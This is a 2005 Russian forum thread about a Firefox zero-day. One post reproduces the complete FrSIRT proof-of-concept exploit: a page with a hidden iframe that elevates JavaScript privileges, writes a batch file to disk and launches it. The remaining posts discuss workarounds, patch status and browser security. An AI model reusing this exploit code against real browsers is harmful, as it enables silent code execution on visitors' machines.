>Форум Mozilla Россия http://forum.mozilla-russia.org/index.php >Firefox http://forum.mozilla-russia.org/viewforum.php?id=4 >гыгык дырка http://forum.mozilla-russia.org/viewtopic.php?id=2877 |
FUBAr > 08-05-2005 19:11:36 |
ктото особомозгастый сделал эксплоит |
FUBAr > 08-05-2005 19:14:32 |
Выделить код Код:// FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched) // If a user clicks anywhere on a specially crafted page, this code will // automatically create and execute a malicious batch/exe file. <html><head><title>firefox 0day exploit</title> <body>Click anywhere inside this page<br> <br>Advisory - http://www.frsirt.com/english/advisories/2005/0493<br> <iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\') {window.name=\'stealcookies\';} else{ event={target:{href:\'http://ftp.mozilla.org/pub/ mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\' UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\']. createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\ booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420); outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\']. createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08 |0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious commands here... \\\\\\\\nPAUSE\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch(); \\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php? id=220&application=firefox\' style=\'cursor:default;\'> </'+'a>'" id="targetframe" scrolling="no" frameborder="0" marginwidth="0" marginheight=0" style= "position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px; padding:0px; -moz-opacity:0"></iframe> <script language="JavaScript" type="text/javascript"> document.onmousemove = function trackMouse(e) { document.getElementById("targetframe").style.left = (e.pageX-3)+"px" document.getElementById("targetframe").style.top = (e.pageY-3)+"px" } var counter = 0; function loader() { counter++ if(counter == 1) { stealcookies.focus() } else if(counter == 2) { stealcookies.history.go(-1) //targetframe.style.display="none"; } } </script> </body> </html> |
FUBAr > 08-05-2005 19:19:25 |
баг позволяет обойти ограничения безопасноти в жс через жс триггер установки расширения |
FUBAr > 08-05-2005 19:21:11 |
это также касается всех геко базированных программ |
FUBAr > 08-05-2005 19:22:44 |
источник grayhats security |
FUBAr > 08-05-2005 19:26:45 |
в комбинацие с дыркой кэша это может быть использованио для афтоматизированного украдвания паролей |
Psilon > 08-05-2005 19:38:36 |
А сколько надо тыкать мышью, что бы что-нибудь произошло? |
djet > 08-05-2005 19:41:28 |
И что должно произойти? Внизу progress bar показывает обращение и загрузку с addons.update.mozilla.org, и всё. Никакого booom.bat я не нашёл. |
FUBAr > 08-05-2005 19:43:57 |
ну мрям таки разбежались рабочий эксплоит выдавать |
Psilon > 08-05-2005 19:46:39 |
Обидно, у меня даже этого нет. Что я делаю не так? |
Psilon > 08-05-2005 19:54:06 |
FUBAr |
djet > 08-05-2005 19:58:48 |
Psilon |
Psilon > 08-05-2005 21:09:25 |
Update (08.05.2005) - The Mozilla Foundation patched (partially) this |
Unghost > 08-05-2005 21:50:38 |
http://www.frsirt.com/exploits/20050507.firefox0day.php
|
Почесал > 08-05-2005 22:02:53 |
Выключите: Разрешать сайтам устанавливать программное обеспечение. Тогда эксплоит не будет работать. Это временный обходной путь. |
djet > 08-05-2005 22:07:40 |
А эксплойт позволяет загружать XPI со всех сайтов или только из моего белого списка? |
Почесал > 08-05-2005 22:10:59 |
Не знаю, у меня экслоит не заработал вообще (из аттачмента на багзилле). Но на всякий случай я выключил сабж моего прошлого поста. |
RED > 08-05-2005 22:40:49 |
FUBAr, слишком много грамматических ошибок и флуда. бан на 2 дня. |
K_Mikhail > 09-05-2005 00:24:38 |
gass512 пишет
K_Mikhail пишет
Убирал разрывы между строками - всё равно не работает. |
Vicious > 09-05-2005 00:34:33 |
Из бага 293302:
|
Почесал > 09-05-2005 09:55:11 |
Да, по-моему поторопился народ. В транке работает, а в 1.0.х что-то работать не хочет. |
Psilon > 09-05-2005 19:42:10 |
Отключение пункта "Разрешать сайтам устанавливать программное обеспечение" не помогает. |
Почесал > 10-05-2005 13:46:10 |
Не путай две разных уязвимости. От уязвимости, связанной с внедрением джаваскрипта в иконку в диалоге: хотите ли установить это расширение? спасает отключение "Разрешать сайтам устанавливать программное обеспечение". А от второй уязвимости, связаной с XSS, спасает отключение JavaScrpt. |
K_Mikhail > 10-05-2005 15:22:25 |
gass512 пишет
О чём можно вообще говорить, если код неработоспособен. Пытаюсь под FF 1.0.2 запустить - не работает. |
Почесал > 10-05-2005 15:43:04 |
Да у меня в 1.0.3 тоже не работает. Но люди говорят, у кого-то работает значит. |
K_Mikhail > 10-05-2005 16:27:34 |
gass512 пишет
Кое-что в коде я поправил при помощи Инспектора DCOM и консоли JavaScript. А учитывая то, что я вообще не знаю никакого программирования - то процесс этот был весьма длительным. Сейчас пытаюсь остальное поправить. Как поправлю - отправлю нашим производителям антивирусов. Хотелось бы всё-таки, чтобы ещё кто-нибудь, кроме меня, попытался привести код в порядок. Тогда дело быстрее пойдёт. |
Почесал > 10-05-2005 16:36:11 |
А зачем это разработчикам антивирусов отправлять? Выйдет 1.0.4 на днях, дык и все, приехал поезд. |
Unghost > 10-05-2005 18:06:36 |
В сегодняшней nightly дыры уже исправлены, кстати. |
K_Mikhail > 10-05-2005 22:29:18 |
Да! Как только не изголялись в обвинениях в дырявости IE. А у самих - те же самые проблемы. Не стыдно? |
hedgehog > 10-05-2005 22:34:13 |
безопасность продукта это не только его не пробиваемость, но и оперативность латания дыр |
RED > 10-05-2005 22:36:11 |
ХЕ-ХЕ! |
Почесал > 10-05-2005 23:14:22 |
Проблемы у IE не в наличии дыр, а в "оперативности" их закрытия, где по полгода-году зияют такие дыры, что ведро со свистом пролетает, и никто не чешется, только юзвери страдают. Ты просто неправильно понимаешь термин "безопасность". |
Pr. > 10-05-2005 23:27:52 |
Unghost пишет
Кстати, никто не поделится ссылочкой на исправленную версию? (в смысле стабильной ветки 1.0.х), можно будет и потестировать, и душа спокойней будет зы кстати, во многих не Mozilla`вских сборках Firefox (в том же MDK) эта "дыра" вообщен не работает. |
Unghost > 10-05-2005 23:44:44 |
Asa сейчас сказал на IRC:
|
K_Mikhail > 11-05-2005 09:38:16 |
gass512 пишет
Я понимаю термин "безопасность" как отсутствие проблем с пометкой "critical" и возможность наложения т.н. hot_security_patch в случае нахождения каких-то дыр. Здесь я ничего такого не вижу. Приходится ждать очередной версии и пытаться по dail-up обновить продукт. Судя по вашим словам, безопасность - это только оперативное реагирование. Как бы не так! ИМХО, если уж FF позиционируется как "безопасный" по сравнению с IE, то эту самую безопасность нужно обеспечивать не только "неподдержкой" VBS и ActiveX. А FF, опять же ИМХО, серьёзно "ломанут". Просто FF ещё не так распространён, как IE, и т.н. "талантливые ребята" ещё не принимались всерьез за Лису. Но 3 прецедента уже есть. Так что попытайтесь их в какой-то мере опередить. |
Почесал > 11-05-2005 09:53:46 |
В версии 1.1 будут маленькие бинарные хотпатчи, не будет необходимости качать весь дистр. А я все равно качать буду, ибо складирую софт, который юзаю, на резервном винте.
А чем еще, кроме как не оперативным закрытием уязвимостей? Или Вы знаете браузер, написанный богами, в котором нет ни одной уязвимости? По секрету Вам скажу -- такого в природе не существует Ни один программист, даже самый талантливый, не может написать идеальный код.
По популярности он давно его обскакал (не по usage share).
Что, где? Покажите мне эти 3 уязвимости. Кто от них пострадал? Вы? Дядя Ваш? Что-то я их не вижу, неужели они уже сто лет как пропатчены? BTW секьюрити-эксперты, которые ищут уязвимости, сообщают об этом прямо на багзиллу, а не как в случае с IE -- трезвонят на всех углах, ведь все равно MS сначала упорно будет молчать, делая вид, что никакой дырки нет, а через год спохватится патч сделать, когда всех юзеров IE поимеют троянами, да и то, помню легендарную историю, как они одну дырку три раза патчили. Так что, где проблемы с безопаснсотью? Я пока что вижу безопасный браузер. |
Digital Mirror > 11-05-2005 12:21:11 |
поддерживаю gass512 да уязвимости есть были и будут всегда, но реально их во-превых очень быстро закрывают (а с выходом 1.1 еще думаю быстрее будет) а во-вторых, стех пор как я слез с ИЕ ( а это случилось с выходом версии firefox 0.8.x) мой антивирус не находит никогда ни одного виря в кэше, что очень часто было с ИЕ, и кто же безопаснее? тем более сколько я не смотрел уязвимости написаные для Firefox они почему то не работали...и в третьих не видел ниодного своего знакомого на Firefox пострадавшего где то от spyware и иже с ними ( не говоря уже об эксплоитах), зато от ИЕшников постоянно вижу вопли и крики, сопровождающиеся обильным post'отделением. |
Unghost > 11-05-2005 20:32:37 |
Тестовые сборки Firefox 1.0.4 можно найти в каталоге http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-aviary1.0.1-l10n/ Если кто протестирует сборку под Linux буду очень благодарен. |
FUBAr > 14-05-2005 08:47:07 |
hello world пока единственная подобная прога |
Skat > 14-05-2005 10:24:38 |
И то, если будет написана в машинных кодах А то вдруг в компиляторе ошибка и т.д. и т.п. |